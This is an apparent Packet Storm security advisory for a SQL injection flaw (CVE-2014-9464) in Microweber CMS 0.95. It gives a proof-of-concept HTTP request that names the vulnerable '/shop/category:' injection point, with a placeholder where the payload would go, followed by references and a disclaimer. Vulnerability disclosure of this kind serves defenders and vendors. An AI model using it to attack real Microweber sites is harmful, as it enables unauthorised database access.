Microweber CMS 0.95 SQL Injection

2015-01-07T00:00:00
ID PACKETSTORM:129843
Type packetstorm
Reporter Pham Kien Cuong
Modified 2015-01-07T00:00:00

Description

                                        
                                            `# Exploit Title: SQL Injection in Microweber CMS 0.95  
# Google Dork: N/A  
# Date: 12/16/2014  
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)  
# Vendor Homepage: Microweber (https://microweber.com/)  
# Software Link: https://github.com/microweber/microweber  
# Version: 0.95  
# Tested on: N/A  
# CVE : CVE-2014-9464  
  
::PROOF OF CONCEPT::  
  
GET /shop/category:[SQL INJECTION HERE] HTTP/1.1  
Host: target.org  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://target/shop  
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275  
Connection: keep-alive  
  
::REFERENCE::  
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html  
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ  
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464  
  
::DISCLAIMER::  
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.  
  
`